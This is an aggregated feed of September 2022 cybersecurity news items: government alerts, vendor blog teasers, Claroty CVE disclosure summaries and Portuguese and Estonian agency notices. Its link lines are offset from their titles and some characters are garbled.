https://dyn.cncs.gov.pt/pt/detalhe/art/135696/mes-europeu-de-ciberseguranca-arranca-hoje
“Comunicar Cibersegurança – o podcast do CNCS” é o novo espaço de conversa do CNCS
2022-09-30T00:00:00Z | 1664496000

Neste espaço de discussão sobre temas que pretendem servir para a promoção e reflexão das matérias de interesse relacionadas com a cibersegurança, os interessados podem ficar a conhecer publicações, atividades e projetos ligados à cibersegurança e aos seus diferentes contextos. Neste primeiro episódio debatem-se os resultados do estudo do Observatório de Cibersegurança do CNCS sobre o Ensino Pós-Secundário e o Ensino Superior de Cibersegurança em Portugal. Os convidados são os coordenadores do estudo Amélia Veiga e Pedro Ferreira, da Universidade do Porto. A conversa é moderada por Sílvia Santos, do CNCS. Aceda a este novo conteúdo em formato vídeo ou áudio aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135695/comunicar-ciberseguranca-o-podcast-do-cncs-e-o-novo-espaco-de-conversa-do-cncs
API Security for DevSecOps
2022-09-29T14:19:00Z | 1664461140

https://www.akamai.com/blog/security/2024/sep/api-security-for-devsecops
Security Alert (A22-09-19): Multiple Vulnerabilities in Cisco Products
2022-09-29T04:00:00Z | 1664424000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-09-20): Vulnerability in Drupal
2022-09-29T04:00:00Z | 1664424000

Drupal has released a security advisory to address a vulnerability in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
Flagging 13 Million Malicious Domains in 1 Month with Newly Observed Domains
2022-09-28T13:00:00Z | 1664370000

Threat Intelligence feeds are an integral part of any security strategy. In this new research see how Akamai researchers were able to find 8 million malicious domains every month to further protect our customers.

https://www.akamai.com/blog/security-research/newly-observed-domains-discovered-13-million-malicious-domains
SASE Enables Consistent Security for the Modern Enterprise
2022-09-28T11:03:37Z | 1664363017

Corporate IT networks are rapidly changing. Evolving cloud and technological innovation have spurred digital transformation efforts. The pandemic has normalized remote and hybrid work, causing many employees to work from outside the office and creating the need to securely provide remote access to the workforce. These changes in corporate IT infrastructure create new security challenges... The post SASE Enables Consistent Security for the Modern Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-enables-consistent-security-for-the-modern-enterprise/
Security Alert (A22-09-17): Multiple Vulnerabilities in Google Chrome
2022-09-28T04:00:00Z | 1664337600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-09-18): Multiple Vulnerabilities in Cisco Products
2022-09-28T04:00:00Z | 1664337600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Publicado o Boletim n.º 3 de 2022 do Observatório de Cibersegurança
2022-09-28T00:00:00Z | 1664323200

Este Boletim apresenta uma análise sobre as diferentes etapas de uma campanha de sensibilização em ciber-higiene nas organizações, de modo a tornar este tipo de ação mais eficaz e consistente com as ameaças identificadas no contexto. Além disso, desenvolve uma reflexão sobre as dificuldades em mudar comportamentos e em avaliar os efeitos da sensibilização. Como sempre, este documento também partilha algumas publicações e notícias.Consulte esta edição aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135691/publicado-o-boletim-n-3-de-2022-do-observatorio-de-ciberseguranca
Akamai Named a Leader in The Forrester Wave?: Web Application Firewalls, Q3 2022
2022-09-27T13:00:00Z | 1664283600

Forrester?s 2022 evaluation of web application firewalls ranks Akamai as a Leader with the top score among all evaluated vendors in the attack detection criterion.

https://www.akamai.com/blog/security/akamai-named-a-leader-in-the-forrester-wave
Akamai Turns Up Linode Past 11
2022-09-27T01:00:00Z | 1664240400

Akamai plans to add more than a dozen data centers, equipped with Linode?s full product suite ? across North America, APAC, LATAM and Europe by the end of 2023.

https://www.akamai.com/blog/cloud/akamai-turns-up-linode-past-11
6 Key Insights from Akamai India Leadership Industry Summits
2022-09-26T13:00:00Z | 1664197200

What does the future look like for consumer-to-internet and OTT media services in India? Here are six thought-provoking insights from CXOs.

https://www.akamai.com/blog/security/6-key-insights-from-akamai-india-leadership-industry-summits
High Threat Security Alert (A22-09-16): Vulnerability in Sophos Firewall
2022-09-26T04:00:00Z | 1664164800

Sophos has published a security advisory to address a code injection vulnerability in the administration interface and user portal of the firewall.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-28816
2022-09-26T00:00:00Z | 1664150400

CWE-89 SQL Injection In Carlo Gavazzi UWP3.0 in multiple versions the Sentilo Proxy is prone to reflected XSS which only affects the Sentilo service.

https://claroty.com/team82/disclosure-dashboard/cve-2022-28816
CVE-2022-28815
2022-09-26T00:00:00Z | 1664150400

CWE-89 SQL Injection In Carlo Gavazzi UWP3.0 in multiple versions the Sentilo Proxy server was discovered to contain a SQL injection vulnerability allowing an attacker to query other tables of the Sentilo service.

https://claroty.com/team82/disclosure-dashboard/cve-2022-28815
CVE-2022-28814
2022-09-26T00:00:00Z | 1664150400

CWE-23 Relative Path Traversal In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions was discovered to be vulnerable to a relative path traversal vulnerability which enables remote attackers to execute code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-28814
CVE-2022-28813
2022-09-26T00:00:00Z | 1664150400

CWE-89 SQL Injection In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could make use of an SQL-injection to gain access to an affected version of the product.

https://claroty.com/team82/disclosure-dashboard/cve-2022-28813
CVE-2022-28812
2022-09-26T00:00:00Z | 1664150400

CWE-798 Use of Hard-Coded Credentials In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could make use of hard-coded credentials to gain SuperUser access to the affected products.

https://claroty.com/team82/disclosure-dashboard/cve-2022-28812
CVE-2022-28811
2022-09-26T00:00:00Z | 1664150400

CWE-20 Improper Input Validation In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could utilize an improper input validation on an API-submitted parameter to access the affected products.

https://claroty.com/team82/disclosure-dashboard/cve-2022-28811
CVE-2022-22526
2022-09-26T00:00:00Z | 1664150400

CWE-306 Missing Authentication for Critical Function In Carlo Gavazzi UWP 3.0 in multiple versions and CPY Car Park Server in multiple versions a missing authentication allows for full access via API.

https://claroty.com/team82/disclosure-dashboard/cve-2022-22526
CVE-2022-22525
2022-09-26T00:00:00Z | 1664150400

CWE-20 Improper Input Validation In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions an remote attacker with admin rights could execute arbitrary commands due to missing input sanitization.

https://claroty.com/team82/disclosure-dashboard/cve-2022-22525
CVE-2022-22524
2022-09-26T00:00:00Z | 1664150400

CWE-98 SQL Injection In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions an unauthenticated remote attacker could utilize a SQL-Injection vulnerability to gain full database access.

https://claroty.com/team82/disclosure-dashboard/cve-2022-22524
CVE-2022-22523
2022-09-26T00:00:00Z | 1664150400

CWE-287 Improper Authentication An improper authentication vulnerability exists in the Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions Web-App which allows an authentication bypass to the context of the user.

https://claroty.com/team82/disclosure-dashboard/cve-2022-22523
CVE-2022-22522
2022-09-26T00:00:00Z | 1664150400

CWE-798: Use of Hard-Coded Credentials In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in multiple versions a remote, unauthenticated attacker could make use of hard-coded credentials to gain full access to the server.

https://claroty.com/team82/disclosure-dashboard/cve-2022-22522
What?s New for Developers: September 2022
2022-09-23T13:00:00Z | 1663938000

Learn about Akamai?s voxel art contest, the updates to EdgeWorkers and EdgeKV demo sites, and how the beta Test Center CLI allows you to test the behavior of configuration changes on your own in this month?s blog.

https://www.akamai.com/blog/developers/whats-new-for-developers-september-2022
Purple Fox Rootkit Now Propagates as a Worm
2022-09-22T19:59:00Z | 1663876740

Purple Fox is an active malware campaign targeting Windows machines. Up until recently, Purple Fox?s operators infected machines by using exploit kits and phishing emails.

https://www.akamai.com/blog/security/purple-fox-rootkit-now-propagates-as-a-worm
Traditional Firewalls Can’t Keep Up with the Growth of Encrypted Traffic
2022-09-22T10:36:20Z | 1663842980

A growing percentage of Internet traffic is protected by encryption. While estimates vary, most agree that at least 80% of Internet traffic uses SSL/TLS to ensure confidentiality, integrity, and authenticity of the data being transmitted. According to Google, approximately 95% of web browsing uses the encrypted HTTPS protocol.  This trend toward traffic encryption has been... The post Traditional Firewalls Can’t Keep Up with the Growth of Encrypted Traffic appeared first on Cato Networks.

https://www.catonetworks.com/blog/traditional-firewalls-cant-keep-up-with-the-growth-of-encrypted-traffic/
Security Alert (A22-09-14): Vulnerability in Microsoft Endpoint Configuration Manager
2022-09-22T04:00:00Z | 1663819200

Microsoft has released an out-of-band security update to address the vulnerability in Microsoft Endpoint Configuration Manager.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-09-15): Multiple Vulnerabilities in ISC BIND
2022-09-22T04:00:00Z | 1663819200

ISC has released a security update to fix the vulnerabilities in BIND.

https://www.govcert.gov.hk/en/alerts_detail.php
uClibC and uClibC-ng libpthread linuxthreads memory corruption vulnerabilities
2022-09-22T00:00:00Z | 1663804800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1517
FritzFrog: A New Generation of Peer-to-Peer Botnets
2022-09-21T20:36:00Z | 1663792560

Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet that has been actively breaching SSH servers since January 2020.

https://www.akamai.com/blog/security/fritzfrog-a-new-generation-of-peer-to-peer-botnets
EDR vs. Segmentation: Understanding the Differences
2022-09-21T13:00:00Z | 1663765200

https://www.akamai.com/blog/security/understanding-the-differences-between-edr-and-segmentation
Security Alert (A22-09-13): Multiple Vulnerabilities in Firefox
2022-09-21T04:00:00Z | 1663732800

Mozilla has published the advisories (MFSA2022-40 and MFSA2022-41) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Uncovering Hidden .NET Assemblies
2022-09-21T00:00:00Z | 1663718400

https://rtx.meta.security/reversing/2022/09/21/Uncovering_Hidden_NET_Assemblies.html
Exploiting Web3's Hidden Attack Surface: Universal XSS on Netlify's Next.js Library
2022-09-21T00:00:00Z | 1663718400

On August 24th, 2022, we reported a vulnerability to Netlify affecting their Next.js "netlify-ipx" repository which would allow an attacker to achieve persistent cross-site scripting and full-response server side request forgery on any website out of the box.

https://samcurry.net/universal-xss-on-netlifys-next-js-library
UK and allies expose Iranian state agency for exploiting cyber vulnerabilities for ransomware operations
2022-09-20T13:19:24Z | 1663679964

Joint advisory highlights threat from cyber actors affiliated with Iran’s IRGC.

https://www.ncsc.gov.uk/news/uk-and-allies-expose-iranian-state-agency-for-exploiting-cyber-vulnerabilities-for-ransom-operations
The Return On Investment of SD-WAN
2022-09-20T09:33:31Z | 1663666411

What is the ROI on SD-WAN projects? Most enterprises look at SD-WAN as an MPLS alternative, hoping to reduce their MPLS connectivity costs. But the actual SD-WAN ROI is a mix of hard and soft savings from increasing overall network capacity and availability to a reduced operational load of managing and securing the network. Let‘s... The post The Return On Investment of SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-return-on-investment-of-sd-wan/
RIA: küberrünnakud meediamajade vastu kasvasid
2022-09-20T09:32:25Z | 1663666345

Riigi infosüsteemi amet (RIA) koostas neile teatatud andmete põhjalt ülevaate Eesti meediaportaale tabanud küberrünnakutest. Võrreldes kahe eelmise aastaga on mõjuga küberrünnakute arv tõusnud.

https://ria.ee/uudised/ria-kuberrunnakud-meediamajade-vastu-kasvasid
CVE-2022-3189
2022-09-20T00:00:00Z | 1663632000

CWE-918: Server-side request forgery A specially crafted PHP script could use parameters from a HTTP request to create a URL capable of changing the host parameter. The changed host parameter in the HTTP could point to another host that will send a request to the host or IP specified in the changed host parameter. Dataprobe iBoot-PDU FW: All Versions prior to 1.42.06162022 are affected. Read Team82's report: Jumping NAT to Shut Down Electric Devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-3189
CVE-2022-3188
2022-09-20T00:00:00Z | 1663632000

CWE-863: Incorrect Authorization Unauthenticated users could open PHP index pages without authentication and download the history file from the device; the history file includes the latest actions completed by specific users. Dataprobe iBoot-PDU FW: All Versions prior to 1.42.06162022 are affected. Read Team82's report: Jumping NAT to Shut Down Electric Devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-3188
CVE-2022-3187
2022-09-20T00:00:00Z | 1663632000

CWE-285: Improper Authorization Certain PHP pages only validate when a valid connection is established with the database. However, these PHP pages do not verify the validity of a user. Attackers could leverage this lack of verification to read the state of outlets. Dataprobe iBoot-PDU FW: All Versions prior to 1.42.06162022 are affected. Read Team82's report: Jumping NAT to Shut Down Electric Devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-3187
CVE-2022-3186
2022-09-20T00:00:00Z | 1663632000

CWE-294: Improper Access Control The affected product allows an attacker to access the device’s main management page from the cloud. This feature enables users to remotely connect devices, however, the current implementation permits users to access other device's information. Dataprobe iBoot-PDU FW: All Versions prior to 1.42.06162022 are affected. Read Team82's report: Jumping NAT to Shut Down Electric Devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-3186
CVE-2022-3185
2022-09-20T00:00:00Z | 1663632000

CWE-200: Exposure of sensitive information to an unauthorized actor The affected product exposes sensitive data concerning the device. Dataprobe iBoot-PDU FW: All Versions prior to 1.42.06162022 are affected. Read Team82's report: Jumping NAT to Shut Down Electric Devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-3185
CVE-2022-3184
2022-09-20T00:00:00Z | 1663632000

CWE-22: Path Traversal The device’s existing firmware allows unauthenticated users to access an old PHP page vulnerable to directory traversal, which may allow a user to write a file to the webroot directory. Dataprobe iBoot-PDU FW: All Versions prior to 1.42.06162022 are affected. Read Team82's report: Jumping NAT to Shut Down Electric Devices.

https://claroty.com/team82/disclosure-dashboard/cve-2022-3184
CVE-2022-3183
2022-09-20T00:00:00Z | 1663632000

CWE-78: OS Command Injection A specific function does not sanitize the input provided by the user, which may expose the affected an OS command injection vulnerability. Dataprobe iBoot-PDU FW: All Versions prior to 1.42.06162022 are affected. Read Team82’s report: Jumping NAT to Shut Down Electric Devices

https://claroty.com/team82/disclosure-dashboard/cve-2022-3183
Meet Prachi Shah, Senior Service Architect
2022-09-19T13:00:00Z | 1663592400

Senior Service Architect Prachi Shah discusses how customer feedback plays a crucial role in product development at Akamai.

https://www.akamai.com/blog/developers/meet-prachi-shah-senior-service-architect
Inquérito de avaliação do Mês Europeu da Cibersegurança
2022-09-19T00:00:00Z | 1663545600

A Agência Europeia para a Segurança das Redes e da Informação (ENISA) promove, em Outubro, a cibersegurança entre cidadãos e organizações da União Europeia, e está em parceria com a Anima People, especialistas em ciências comportamentais relacionadas com a segurança, num projeto crítico para avaliar campanhas de sensibilização para a cibersegurança na mudança de comportamento entre os colaboradores. Os resultados deste projeto beneficiarão organizações a projetar campanhas bem-sucedidas, ajudando a impulsionar um comportamento de longo prazo que conduza a um mundo mais ciberseguro. A sua participação é fundamental. Para participar basta clicar no seguinte link.Security is OUR business.

https://dyn.cncs.gov.pt/pt/detalhe/art/135690/inquerito-de-avaliacao-do-mes-europeu-da-ciberseguranca
In-App Browsers and Akamai Client-Side Protection & Compliance
2022-09-16T13:00:00Z | 1663333200

Learn how Akamai's Client-Side Protection & Compliance tracks In-App browser injections to make sure sensitive information is kept safe and private.

https://www.akamai.com/blog/security-research/In-app-browsers-and-akamai-page-integrity-manager
Akamai?s Perspective on September?s Patch Tuesday
2022-09-16T05:00:00Z | 1663304400

Every Patch Tuesday stirs up the community. See Akamai's September insights and recommendations on what to focus on, and patch, patch, patch!

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-september
Security Alert (A22-09-12): Multiple Vulnerabilities in Microsoft Edge
2022-09-16T04:00:00Z | 1663300800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Fidelis Security Secures Significant Additional Growth Investment From Runway Growth Capital and Skyview Capital
2022-09-15T20:57:53Z | 1663275473

WOODSIDE, Calif., Sept. 15, 2022 /PRNewswire/ — Runway Growth Capital LLC (“Runway”), a leading provider of growth loans to both venture and non-venture backed companies seeking an alternative to raising equity, and Skyview Capital, LLC (“Skyview”), a global private investment firm specializing in the acquisition and management of mission critical enterprises in technology, telecommunications, business […] The post Fidelis Security Secures Significant Additional Growth Investment From Runway Growth Capital and Skyview Capital appeared first on Fidelis Security.

https://fidelissecurity.com/press/fidelis-security-secures-significant-additional-growth-investment-from-runway-growth-capital-and-skyview-capital/
Five Virtual Firewall Myths Debunked
2022-09-15T14:37:43Z | 1663252663

While the benefits of virtualization for our organizations are becoming widely recognized, some network security professionals remain hesitant to deploy virtual firewalls in their private network. Is it because of some virtual firewall myths? Do they not believe it can deliver the functionality they need? Is it because they don’t think they need them? Or, […] The post Five Virtual Firewall Myths Debunked appeared first on Corsa Security.

https://www.corsa.com/2022/09/15/five-virtual-firewall-myths-debunked/
Record-Breaking DDoS Attack in Europe
2022-09-15T13:00:00Z | 1663246800

On Monday, September 12, 2022, Akamai successfully detected and mitigated the now-largest DDoS attack ever launched.

https://www.akamai.com/blog/security/record-breaking-ddos-attack-in-europe
Threat level in cyber environment has risen – activity towards Finland has increased
2022-09-15T10:09:09Z | 1663236549

The number of cyberattacks has increased globally this year. After a quieter period in the spring, the number of attacks is on the rise in Finland. Based on reports received by the National Cyber Security Centre Finland (NCSC-FI) at Traficom, attacks against Finnish organisations increasingly often employ malware, phishing and denial-of-service attacks.

https://www.kyberturvallisuuskeskus.fi/en/news/threat-level-cyber-environment-has-risen-activity-towards-finland-has-increased
Threat level in cyber environment has risen – activity towards Finland has increased
2022-09-15T10:09:09Z | 1663236549

The number of cyberattacks has increased globally this year. After a quieter period in the spring, the number of attacks is on the rise in Finland. Based on reports received by the National Cyber Security Centre Finland (NCSC-FI) at Traficom, attacks against Finnish organisations increasingly often employ malware, phishing and denial-of-service attacks.

https://www.kyberturvallisuuskeskus.fi/en/news/threat-level-cyber-environment-has-risen-activity-towards-finland-has-increased
Network Firewalls Are Still Vital in the Era of the Cloud
2022-09-15T08:36:15Z | 1663230975

Today, nearly all companies have some form of cloud infrastructure, and 89% are operating multi-cloud deployments. In general, this trend seems to be continuing with many companies planning to move additional assets to the cloud. With the adoption of cloud infrastructure, organizations must reexamine their existing security infrastructures. Some security solutions are ill-suited to securing... The post Network Firewalls Are Still Vital in the Era of the Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/network-firewalls-are-still-vital-in-the-era-of-the-cloud/
It pays to be Circomspect
2022-09-15T04:00:43Z | 1663214443

In October 2019, a security researcher found a devastating vulnerability in Tornado.cash, a decentralized, non-custodial mixer on the Ethereum network. Tornado.cash uses zero-knowledge proofs (ZKPs) to allow its users to privately deposit and withdraw funds. The proofs are supposed to guarantee that each withdrawal can be matched against a […]

https://blog.trailofbits.com/2022/09/15/it-pays-to-be-circomspect/
Security Alert (A22-09-10): Multiple Vulnerabilities in Google Chrome
2022-09-15T04:00:00Z | 1663214400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-09-11): Multiple Vulnerabilities in Cisco Products
2022-09-15T04:00:00Z | 1663214400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Responda a Inquérito acerca dos comportamentos e perceções sobre cibersegurança
2022-09-15T00:00:00Z | 1663200000

O Centro Nacional de Cibersegurança e o Centro Internet Segura, no âmbito do Observatório de Cibersegurança, encontram-se a realizar um estudo, com o apoio de uma equipa do Audax_Iscte, que pretende conhecer a opinião da população em geral, com mais de 18 anos, sobre a temática da cibersegurança (isto é, qual o sentimento de segurança percecionado pelas pessoas quando usam a Internet e as tecnologias digitais, bem como os cuidados que as mesmas adotam nessa utilização), procurando-se explorar os conhecimentos e comportamentos que a população tem sobre este assunto. Para o efeito, apelamos à participação, respondendo ao Inquérito - Comportamentos e perceções sobre cibersegurança.A sua participação é fundamental. Para participar basta clicar no seguinte link.É possível responder até dia 24 de setembro.

https://dyn.cncs.gov.pt/pt/detalhe/art/135688/responda-a-inquerito-acerca-dos-comportamentos-e-percecoes-sobre-ciberseguranca
5 Reasons Taiwan Is a Growing Source of US-China Tension
2022-09-14T16:02:21Z | 1663171341

At the end of last year, Flashpoint correctly forecasted that Taiwan would prove critical to US-China relations. In the same way its asserted authority over Hong Kong, recovering Taiwan, we wrote, would also continue to be a primary pillar of China’s geopolitical strategy. The post 5 Reasons Taiwan Is a Growing Source of US-China Tension appeared first on Flashpoint.

https://flashpoint.io/blog/5-reasons-taiwan-is-a-growing-source-of-us-china-tension/
CERT-EE hoiatab: uuenda oma Apple'i seade esimesel võimalusel
2022-09-14T09:50:11Z | 1663149011

Uuendamata Apple'i seadmed sisaldavad olulist turvanõrkust, mistõttu CERT-EE soovitab oma seadet esimesel võimalusel uuendada! CVE-2022-32917-nimelise turvanõrkuse abil on ründajal võimalik pääseda kasutaja seadmesse ja seal pahandust korda saata.

https://ria.ee/uudised/cert-ee-hoiatab-uuenda-oma-applei-seade-esimesel-voimalusel
High Threat Security Alert (A22-09-08): Multiple Vulnerabilities in Microsoft Products (September 2022)
2022-09-14T04:00:00Z | 1663128000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-09-09): Multiple Vulnerabilities in Trend Micro Apex One
2022-09-14T04:00:00Z | 1663128000

Trend Micro has published a security advisory to address multiple vulnerabilities in Apex One.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-2333
2022-09-14T00:00:00Z | 1663113600

CWE-427: Uncontrolled Search Path Element If an attacker manages to trick a valid user into loading a malicious DLL, the attacker may be able to achieve code execution in the application’s context and permissions.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2333
CVE-2022-2332
2022-09-14T00:00:00Z | 1663113600

CWE-732: Incorrect Permission Assignment for Critical Resource A local unprivileged attacker may escalate to administrator privileges, due to insecure permission assignment.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2332
Navigating the supply-chain challenge
2022-09-13T15:15:13Z | 1663082113

Navigating the supply chain security challenge: Defending against 5 common attack vectors Cyber attacks on supply chains more than quadrupled in just a year (from 2019-2020), and 84% of IT decision makers around the world believe that “software supply chain attacks could become one of the biggest cyber threats to organizations like theirs within the next three years.” Yet, surprisingly, only 36% of those surveyed have vetted the security posture of their suppliers within the last year, according to CrowdStrike’s 2021 Global Security Attitude Survey.

https://www.ironnet.com/resource-library/navigating-the-supply-chain-challenge
MKM: Algab projekt "Anneta kõnet"
2022-09-13T12:54:45Z | 1663073685

Algab esimene ulatuslik eestikeelse kõne ja murrete kogumise laine peale rahvuslikku ärkamisaega. “Anneta kõnet” projekt kutsub kõiki eesti keelt kõnelevaid inimesi oma kõnet annetama, panustades seeläbi eesti keele säilimisse ning kõnetehnoloogia lahenduste kiirema jõudmiseni meie igapäevaellu, kirjutab majandus- ja kommunikatsiooniministeerium pressiteates.

https://ria.ee/uudised/mkm-algab-projekt-anneta-konet
Smart and digital devices should be recycled too
2022-09-13T10:37:02Z | 1663065422

Old electrical and electronic equipment are often left to gather dust in drawers. An average European household has up to 72 pieces of electrical and electronic equipment with 11 of them broken or unused for some other reason. Unused devices contain plenty of precious metals that can be reused. By recycling these materials, we can boost sustainable digitalisation and the electrification of transport, for example.

https://www.kyberturvallisuuskeskus.fi/en/news/smart-and-digital-devices-should-be-recycled-too
Smart and digital devices should be recycled too
2022-09-13T10:37:02Z | 1663065422

Old electrical and electronic equipment are often left to gather dust in drawers. An average European household has up to 72 pieces of electrical and electronic equipment with 11 of them broken or unused for some other reason. Unused devices contain plenty of precious metals that can be reused. By recycling these materials, we can boost sustainable digitalisation and the electrification of transport, for example.

https://www.kyberturvallisuuskeskus.fi/en/news/smart-and-digital-devices-should-be-recycled-too
High Threat Security Alert (A22-09-07): Multiple Vulnerabilities in Apple iOS and iPadOS
2022-09-13T04:00:00Z | 1663041600

Apple has released iOS 15.7, iOS 16 and iPadOS 15.7 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
A sétima edição do Cyber Security Challenge já arrancou!
2022-09-13T00:00:00Z | 1663027200

O Cyber Security Challenge 2022 é uma iniciativa promovida pela ENISA - Agência Europeia para a Cibersegurança, e este ano levará a jogo equipas oriundas de 33 Países (28 europeus e 5 convidados), compostas por 10 jovens talentos nacionais representando as cores do seu País. Esta competição que se poderá qualificar como a mais importante competição deste tipo na Europa, visa não só promover a identificação de talentos em cibersegurança, como também, a cooperação e sentido de comunidade. Com este desígnio, ao longo de 3 dias, as equipas serão desafiadas a resolver problemas relacionados com a segurança informática em vários domínios, tais como, a segurança na web, segurança móvel, Hardware, criptografia, engenharia reversa ou forense. Este ano, a competição terá uma novidade relativamente aos anos anteriores, através de uma prova de ataque e defesa, onde cada equipa terá que defender as suas próprias infraestruturas, ao mesmo tempo que ataca as restantes. Recorde-se que, Portugal através da iniciativa CyberSecurity Challenge PT, que agrega o Centro Nacional de Cibersegurança, o Instituto Superior Técnico, a Universidade do Porto e a AP2SI -Associação Portuguesa para a Promoção da Segurança da Informação, marcará mais uma vez presença nesta competição. Para isso, os 10 jovens que representam agora a seleção nacional, foram identificados através de uma prova de qualificação, ocorrida no passado mês de julho, e têm vindo a ser preparados pelos treinadores e de outros membros da comunidade de cibersegurança portuguesa, alguns dos quais participantes na seleção portuguesa de antigas edições.

https://dyn.cncs.gov.pt/pt/detalhe/art/135689/a-setima-edicao-do-cyber-security-challenge-ja-arrancou
UK condemns Iranian state-linked actors for cyber attack against Albania
2022-09-08T14:56:56Z | 1662649016

The UK has attributed a series of cyber attacks on Albanian government infrastructure to Iranian state-linked actors.

https://www.ncsc.gov.uk/news/uk-condemns-cyber-attack
DDoS in Financial Services: What to Know and What to Do
2022-09-08T13:00:00Z | 1662642000

Akamai explores trends of recent application-layer DDoS attacks across the Financial Services industry

https://www.akamai.com/blog/security-research/ddos-in-financial-services
How to Fight Video Piracy: Notes from a Real-Life Battle
2022-09-08T13:00:00Z | 1662642000

Video streaming is increasing and so is video piracy. Learn more about these types of piracy cybercrimes, and how to be proactive in stopping them.

https://www.akamai.com/blog/security/how-to-fight-video-piracy-notes-from-a-real-life-battle
Why Traditional NGFWs Fail to Meet Today’s Business Needs
2022-09-08T12:36:57Z | 1662640617

The modern business looks very different from that of even a few years ago. IT technologies have changed rapidly, and corporate networks are quickly becoming more distributed and complex. While this brings business benefits, it also creates significant challenges.  One of the biggest hurdles that companies face is ensuring that the evolution of their IT... The post Why Traditional NGFWs Fail to Meet Today’s Business Needs appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-traditional-ngfws-fail-to-meet-todays-business-needs/
Olukord küberruumis – august 2022
2022-09-08T06:00:00Z | 1662616800

Augustis registreerisime 252 mõjuga intsidenti, mis on viimase poole aasta kõige kõrgem näitaja.

https://ria.ee/uudised/olukord-kuberruumis-august-2022
Security Alert (A22-09-06): Multiple Vulnerabilities in Cisco Products
2022-09-08T04:00:00Z | 1662609600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-2973
2022-09-08T00:00:00Z | 1662595200

CWE-476 Null Pointer Dereference The affected product uses a NULL pointer in certain situations. which could allow an attacker to crash the server.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2973
CVE-2022-2972
2022-09-08T00:00:00Z | 1662595200

CWE-121 Stack-Based Buffer Overflow The affected product is vulnerable to a stack-based buffer overflow, which could allow an attacker to crash the device or remotely execute arbitrary code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2972
CVE-2022-2971
2022-09-08T00:00:00Z | 1662595200

CWE-843 Access of Resource Using Incompatible Type The affected product accesses a resource using an incompatible type, which could allow an attacker to crash the server with a malicious payload.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2971
CVE-2022-2970
2022-09-08T00:00:00Z | 1662595200

CWE-121 Stack-Based Buffer Overflow The affected product does not sanitize input before memcpy is used, which could allow an attacker to crash the device or remotely execute arbitrary code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2970
CVE-2022-25897
2022-09-08T00:00:00Z | 1662595200

The close session request closes a connected session. A deleteSubscription flag is also sent in that message and determines whether the server should save the subscriptions for a future session reconnection or discard them upon session termination. If the deleteSubscription flag is False the server will store the subscriptions thus filling up the memory in an unlimited manner. Sending multiple subscribe requests with multiple monitored items from multiple sessions will quickly fill up the process memory until the server crashes. To trigger this bug all is needed is to create many sessions with subscriptions and monitored items without ever deleting the monitored items. Eventually these allocations will consume all the available process memory which will lead to a crash and denial of service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2022-25897
Cyberterrorists Target Record Number of Victims with DDoS Attacks in Q2
2022-09-07T13:00:00Z | 1662555600

In Q2, cyberterrorists targeted a record number of customer locations (groupings of assets based on cloud presence or physical data center) with DDoS attacks.

https://www.akamai.com/blog/security/cyberterrorists-target-record-number-of-victims
Security Alert (A22-09-05): Multiple Vulnerabilities in Android
2022-09-07T04:00:00Z | 1662523200

Google has released Android Security Bulletin September 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai Named a 2022 Gartner� Magic Quadrant Leader for Cloud Web Application and API Protection
2022-09-06T15:00:00Z | 1662476400

Akamai was named a Leader in the 2022 Gartner� Magic Quadrant for Cloud Web Application and API Protection (WAAP) report, and was positioned highest for Ability to Execute and furthest for Completeness of Vision.

